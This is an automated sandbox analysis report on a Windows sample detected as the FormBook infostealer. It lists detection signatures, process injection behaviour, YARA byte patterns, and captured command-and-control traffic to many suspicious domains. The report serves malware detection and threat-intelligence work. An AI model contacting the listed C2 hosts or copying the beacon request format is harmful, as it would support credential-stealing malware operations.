Windows Analysis Report
p4rsJEIb7k.exe

Overview

General Information

Sample name: p4rsJEIb7k.exe
Analysis ID: 1549358
MD5: 159afc06a66a86f332be92f52963b09e
SHA1: 0cb60fe78cad1919e4c1ef5d315752e9147a7792
SHA256: 64b147e7c878171760935be6fde4ba79aedf2e045e78ad8a4eaf235ce60f6fdf

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Contains functionality to detect sleep reduction / modifications
Found direct / indirect Syscall (likely to bypass EDR)
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Switches to a custom stack to bypass stack traces
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
PE file contains an invalid checksum
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64native
  • p4rsJEIb7k.exe (PID: 4816 cmdline: "C:\Users\user\Desktop\p4rsJEIb7k.exe" MD5: 159AFC06A66A86F332BE92F52963B09E)
    • svchost.exe (PID: 3088 cmdline: "C:\Users\user\Desktop\p4rsJEIb7k.exe" MD5: B7C999040D80E5BF87886D70D992C51E)
      • BlltrVxNMs.exe (PID: 4732 cmdline: "C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe" MD5: 32B8AD6ECA9094891E792631BAEA9717)
        • msiexec.exe (PID: 6748 cmdline: "C:\Windows\SysWOW64\msiexec.exe" MD5: 9D09DC1EDA745A5F87553048E57620CF)
          • firefox.exe (PID: 7304 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: FA9F4FC5D7ECAB5A20BF7A9D1251C851)
  • cleanup
No configs have been found
Source: 00000001.00000002.4812307431.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000001.00000002.4812307431.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown, Strings:
  • 0x2f0e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17262:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 00000003.00000002.8170544463.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 00000003.00000002.8170544463.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown, Strings:
  • 0x2bd60:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x13edf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 00000002.00000002.9380185277.00000000015B0000.00000040.80000000.00040000.00000000.sdmp, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security

Source: 1.2.svchost.exe.400000.0.unpack, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 1.2.svchost.exe.400000.0.unpack, Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown, Strings:
  • 0x2e2e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x16462:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
Source: 1.2.svchost.exe.400000.0.raw.unpack, Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Author: Joe Security
Source: 1.2.svchost.exe.400000.0.raw.unpack, Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Author: unknown, Strings:
  • 0x2f0e3:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x17262:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01

            System Summary

            Source: Process started, Author: Florian Roth (Nextron Systems), Data: Command: "C:\Users\user\Desktop\p4rsJEIb7k.exe", CommandLine: "C:\Users\user\Desktop\p4rsJEIb7k.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\p4rsJEIb7k.exe", ParentImage: C:\Users\user\Desktop\p4rsJEIb7k.exe, ParentProcessId: 4816, ParentProcessName: p4rsJEIb7k.exe, ProcessCommandLine: "C:\Users\user\Desktop\p4rsJEIb7k.exe", ProcessId: 3088, ProcessName: svchost.exe
            Source: Process started, Author: vburov, Data: Command: "C:\Users\user\Desktop\p4rsJEIb7k.exe", CommandLine: "C:\Users\user\Desktop\p4rsJEIb7k.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\p4rsJEIb7k.exe", ParentImage: C:\Users\user\Desktop\p4rsJEIb7k.exe, ParentProcessId: 4816, ParentProcessName: p4rsJEIb7k.exe, ProcessCommandLine: "C:\Users\user\Desktop\p4rsJEIb7k.exe", ProcessId: 3088, ProcessName: svchost.exe

            AV Detection

            Source: p4rsJEIb7k.exe, Avira: detected
            Source: p4rsJEIb7k.exe, ReversingLabs: Detection: 68%
            Source: Yara match, File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara match, File source: 00000001.00000002.4812307431.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.8170544463.0000000004FE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.9380185277.00000000015B0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000002.00000002.9381714381.00000000050A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000001.00000002.4813936087.0000000003350000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000003.00000002.8170470399.0000000004F90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match, File source: 00000001.00000002.4815096590.0000000005800000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: p4rsJEIb7k.exe, Joe Sandbox ML: detected
            Source: p4rsJEIb7k.exe, Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Binary string: msiexec.pdb source: svchost.exe, 00000001.00000003.4781384098.0000000002E3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.4781220236.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, BlltrVxNMs.exe, 00000002.00000003.4880463662.0000000001335000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: msiexec.pdbGCTL source: svchost.exe, 00000001.00000003.4781384098.0000000002E3B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.4781220236.0000000002E1A000.00000004.00000020.00020000.00000000.sdmp, BlltrVxNMs.exe, 00000002.00000003.4880463662.0000000001335000.00000004.00000001.00020000.00000000.sdmp
            Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: BlltrVxNMs.exe, 00000002.00000000.4736161942.0000000000ABE000.00000002.00000001.01000000.00000004.sdmp
            Source: Binary string: wntdll.pdbUGP source: p4rsJEIb7k.exe, 00000000.00000003.4325817635.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp, p4rsJEIb7k.exe, 00000000.00000003.4326551260.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.4724121009.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.4814046744.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.4814046744.000000000352D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.4721063151.0000000003000000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4812614041.0000000004E19000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.8170719186.0000000005170000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.8170719186.000000000529D000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4816265673.0000000004FC1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: wntdll.pdb source: p4rsJEIb7k.exe, 00000000.00000003.4325817635.0000000004DB0000.00000004.00001000.00020000.00000000.sdmp, p4rsJEIb7k.exe, 00000000.00000003.4326551260.0000000004C10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.4724121009.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.4814046744.0000000003400000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.4814046744.000000000352D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.4721063151.0000000003000000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, msiexec.exe, 00000003.00000003.4812614041.0000000004E19000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.8170719186.0000000005170000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000003.00000002.8170719186.000000000529D000.00000040.00001000.00020000.00000000.sdmp, msiexec.exe, 00000003.00000003.4816265673.0000000004FC1000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: BlltrVxNMs.exe, 00000002.00000002.9389382295.000000000578C000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.000000000584C000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8169483298.00000000032F3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.00000000298EC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: BlltrVxNMs.exe, 00000002.00000002.9389382295.000000000578C000.00000004.80000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8171535667.000000000584C000.00000004.10000000.00040000.00000000.sdmp, msiexec.exe, 00000003.00000002.8169483298.00000000032F3000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000004.00000002.5103228729.00000000298EC000.00000004.80000000.00040000.00000000.sdmp
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe, Code function: 0_2_00452126 FindFirstFileW,Sleep,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe, Code function: 0_2_0045C999 FindFirstFileW,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe, Code function: 0_2_00436ADE GetFileAttributesW,FindFirstFileW,FindClose
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe, Code function: 0_2_00434BEE FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe, Code function: 0_2_0045DD7C FindFirstFileW,FindClose
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe, Code function: 0_2_0044BD29 FindFirstFileW,CopyFileW,lstrcmpiW,DeleteFileW,MoveFileW,CopyFileW,DeleteFileW,CopyFileW,FindClose,MoveFileW,FindNextFileW,FindClose
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe, Code function: 0_2_00436D2D FindFirstFileW,CreateFileW,SetFileTime,CloseHandle,SetFileTime,CloseHandle
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe, Code function: 0_2_00442E1F SetCurrentDirectoryW,FindFirstFileW,SetCurrentDirectoryW,FindFirstFileW,FindNextFileW,FindClose,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe, Code function: 0_2_00475FE5 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exe, Code function: 0_2_0044BF8D FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4x nop then pop edi, 1_2_00418943
            Source: C:\Windows\SysWOW64\svchost.exe, Code function: 4x nop then xor esi, esi, 1_2_004183C4
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe, Code function: 4x nop then pop edi, 2_2_015BDC23
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe, Code function: 4x nop then xor eax, eax, 2_2_015C1794
            Source: C:\Program Files (x86)\ewEeQxZDbbRQOQfEtpPMeQHxvpfyAEoqAbaOCWjqwSjTSNvirOQyj\BlltrVxNMs.exe, Code function: 4x nop then pop edi, 2_2_05382343
            Source: C:\Windows\SysWOW64\msiexec.exe, Code function: 4x nop then mov ebx, 00000004h, 3_2_054C04E8

            Networking

            Source: Network traffic, Suricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.11.20:49754 -> 119.18.54.27:80
            Source: DNS query: www.030002832.xyz
            Source: DNS query: www.pwk-24.xyz
            Source: Joe Sandbox View, IP Address: 15.197.148.33
            Source: Joe Sandbox View, IP Address: 13.248.169.48
            Source: Joe Sandbox View, ASN Name: TANDEMUS
            Source: Joe Sandbox View, ASN Name: NAMECHEAP-NETUS
            Source: Joe Sandbox View, ASN Name: AMAZON-02US
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 9.9.9.9
            Source: C:\Users\user\Desktop\p4rsJEIb7k.exeCode function: 0_2_0044289D InternetQueryDataAvailable,InternetReadFile,0_2_0044289D
            Source: global trafficHTTP traffic detected: GET /vq3l/?Q2_4=WKR5ld2WiQxHxPDU6pm8hrTzAxfoYD+zNd+jQFHpl4y5z9MlTNWt1pAD28TX6W++2340V0NEzWPPUH5FlugQl+5D7H7BO9/OK4RESnHOQd/yty8pNcZLL2g=&uXP=1HX8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.nagasl89.babyUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
            Source: global trafficHTTP traffic detected: GET /ytnk/?Q2_4=uFAB3rEwaKr/uv81jElgMKFBplV4zOO0W/0UV/qGGe8UYgGdotW+PL1Lw+hHObTImHBkjwc0j1onCJuTKIEEH1/5TCKt9SsHo63opvn6TJdVFqr1WzvPAJA=&uXP=1HX8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.abuali-contracting.artUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
            Source: global trafficHTTP traffic detected: GET /5g7z/?Q2_4=kK8eGZeOL0c0i7pZ0ONPINYAGZoAPWpd4nCLeggjcj8HoPAJjspSGomAMuDSSayw1bMnL6JfGjY3P9qtC0w+rul42/5pklRpQ1va0t0kDdVVqU9rzEU/DKw=&uXP=1HX8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.godskids.storeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
            Source: global trafficHTTP traffic detected: GET /o2wj/?Q2_4=6LtjBDJj0uphlWGPUfsWns8NqP5UEL6FPz1cDqFjhhwngDvwQ5o3u1RN/IkqtEFfAoNcvBtCSqAXdbdyLf0jo5EGqFac5ns//rYVLRsufIrNIa29XQHyhaQ=&uXP=1HX8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.030002832.xyzUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
            Source: global trafficHTTP traffic detected: GET /44hl/?Q2_4=0mQqee+UGJnUA/Yx1BcY9bAABUibbqUVx0XTpT1xrmayiD/fNEmP8Z3r8TZ3vglxtN5riIpUZVEdwgctiqwj4JSuSDuD97XK84LsZQ3P19o3XG1/uWMy0C8=&uXP=1HX8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.wonders8.liveUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
            Source: global trafficHTTP traffic detected: GET /oy0l/?uXP=1HX8&Q2_4=vcWw5DdjdQnkJmRMu9Bv0nYhxIjg8XNP87kLKcEwcjL/VJXYlRnLhwXYdIbeiM5Wp1LHJGQmwLmzd8N63pnOImbiL9MWYGLhlQi4+Y3hzWOb/gf9Ze4XcY0= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.nidedabeille.netUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
            Source: global trafficHTTP traffic detected: GET /3qrm/?Q2_4=tyeG08MV0U64WH6unwcOXR2sJCf/xqZR+j/9sSFSjjXbCPJ8dUZ7AUStEW8oibqh5p8I6M3vE8IgylEGfxaCpffC+Ti1QKudju6yjlF7VN/fdeOaTvtkuuM=&uXP=1HX8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.brunvox.siteUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
            Source: global trafficHTTP traffic detected: GET /gqtu/?uXP=1HX8&Q2_4=f6Wh19Zbj3f0KGUwZR2TDfnh8ZC1kt4m9SH2+p3LnlYuxzS1qi5wc2xrbNMUplnXpMrttmRXmQTtzIwx74OUI7QZZXrSykXx07R8xuG/LilMEmUkiLjEEHk= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.osi.gardenUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
            Source: global trafficHTTP traffic detected: GET /yg1w/?Q2_4=B/h41wdzKHxv2H2J8JkNr9NyFguRLdtCgIEX5jqCPHbFCbPf8ZDAyvcb9g9cRq9SizS8TlHunVk6R9fe76EcgvsehxPtxmeCiZqIleDJmBUfq+mqOPWirkU=&uXP=1HX8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.983743.vinUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
            Source: global trafficHTTP traffic detected: GET /ppmq/?uXP=1HX8&Q2_4=KRVOuqNXYxyDgODQvejwfHP1kSw7YgglxTu2jlorf4EUTkuZz6rgp0sXDkV2rkGK77WHny3VDG/xcSWz2Ew3DtXH4m1AMWH2WLdk5ansbP7qCtZCj8eJzNQ= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.parkerstraus.devUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
            Source: global trafficHTTP traffic detected: GET /sws3/?Q2_4=nV4LnquDqwBlA07HQ+G/v4eHjjrt+T2QZG3593DoQvpPwtJ1qSvdLT+tAqFoiYkQqMds5fxc5qEgqBHWhT8GH/u4GJVId9VOA+wH6Rzyb1bp8I1+ufyyCcg=&uXP=1HX8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.mynotebook.shopUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
            Source: global trafficHTTP traffic detected: GET /zut6/?Q2_4=Kt4qQSLgj4HorxpxZIZ4p+EAwKHWi+XN9OiBuCBJU5cikXkc2Sk5R2gtgSdO+P2tW+5SfoOeVCvwWIOnLXM8QNp6yDsCjrxQ3ZxiPCiDnoMvdK5RCpNRC70=&uXP=1HX8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.notepad.mobiUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
            Source: global trafficHTTP traffic detected: GET /7sxb/?Q2_4=tN4pBPdIy5yR3QdP6gZ8D8aFehGETDFYb1Vi1ndOQOBeKVKVLkgKnsMB8I7daeFpk1t8wQFPQHt0hTDP8VSpMA6XkXbq7RBf6U2uwyI0bQpdefBdwJy0dog=&uXP=1HX8 HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-usConnection: closeHost: www.hyman.lifeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
            Source: global trafficDNS traffic detected: DNS query: www.nagasl89.baby
            Source: global trafficDNS traffic detected: DNS query: www.abuali-contracting.art
            Source: global trafficDNS traffic detected: DNS query: www.godskids.store
            Source: global trafficDNS traffic detected: DNS query: www.030002832.xyz
            Source: global trafficDNS traffic detected: DNS query: www.wonders8.live
            Source: global trafficDNS traffic detected: DNS query: www.pwk-24.xyz
            Source: global trafficDNS traffic detected: DNS query: www.nidedabeille.net
            Source: global trafficDNS traffic detected: DNS query: www.brunvox.site
            Source: global trafficDNS traffic detected: DNS query: www.osi.garden
            Source: global trafficDNS traffic detected: DNS query: www.983743.vin
            Source: global trafficDNS traffic detected: DNS query: www.parkerstraus.dev
            Source: global trafficDNS traffic detected: DNS query: www.mynotebook.shop
            Source: global trafficDNS traffic detected: DNS query: www.bav.lat
            Source: global trafficDNS traffic detected: DNS query: www.notepad.mobi
            Source: global trafficDNS traffic detected: DNS query: www.5oxzis.top
            Source: global trafficDNS traffic detected: DNS query: www.hyman.life
            Source: unknownHTTP traffic detected: POST /ytnk/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflateAccept-Language: en-usContent-Length: 201Content-Type: application/x-www-form-urlencodedConnection: closeCache-Control: no-cacheHost: www.abuali-contracting.artOrigin: http://www.abuali-contracting.artReferer: http://www.abuali-contracting.art/ytnk/User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:5.0.1) Gecko/20100101 Firefox/5.0.1
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:33:53 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closevary: Accept-Encodingcf-cache-status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=xYFQ15sgg3sNfaHR7ZWbibC%2FoexqyuLJIbPFTcdmwXy%2Few4tVOYXnv4ZZsG2I9%2B%2FWCe%2Bh2euRAluH21zly4wVAC8B92TOdwqSxZ07XO2ODRBJp%2FpQn4gBzpuqRuv3tXnI1uGWA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8ddd8fb7b8f2726f-EWRalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=104780&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=457&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:34:08 GMTServer: ApacheX-Powered-By: PHP/8.1.29Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://abuali-contracting.art/wp-json/>; rel="https://api.w.org/"Strict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffVary: Accept-EncodingContent-Encoding: gzipContent-Length: 24178Connection: closeContent-Type: text/html; charset=UTF-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:34:11 GMTServer: ApacheX-Powered-By: PHP/8.1.29Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://abuali-contracting.art/wp-json/>; rel="https://api.w.org/"Strict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffVary: Accept-EncodingContent-Encoding: gzipContent-Length: 24178Connection: closeContent-Type: text/html; charset=UTF-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 05 Nov 2024 14:34:13 GMTServer: ApacheX-Powered-By: PHP/8.1.29Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://abuali-contracting.art/wp-json/>; rel="https://api.w.org/"Strict-Transport-Security: max-age=63072000; includeSubDomainsX-Frame-Options: SAMEORIGINX-Content-Type-Options: nosniffVary: Accept-EncodingContent-Encoding: gzipContent-Length: 24178Connection: closeContent-Type: text/html; charset=UTF-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Tue, 05 Nov 2024 14:34:35 GMTContent-Type: text/html; charset=utf-8Transfer-Encoding: chunkedConnection: closeVary: Accept-EncodingETag: W/"66cce1df-b96"Content-Encoding: gzip
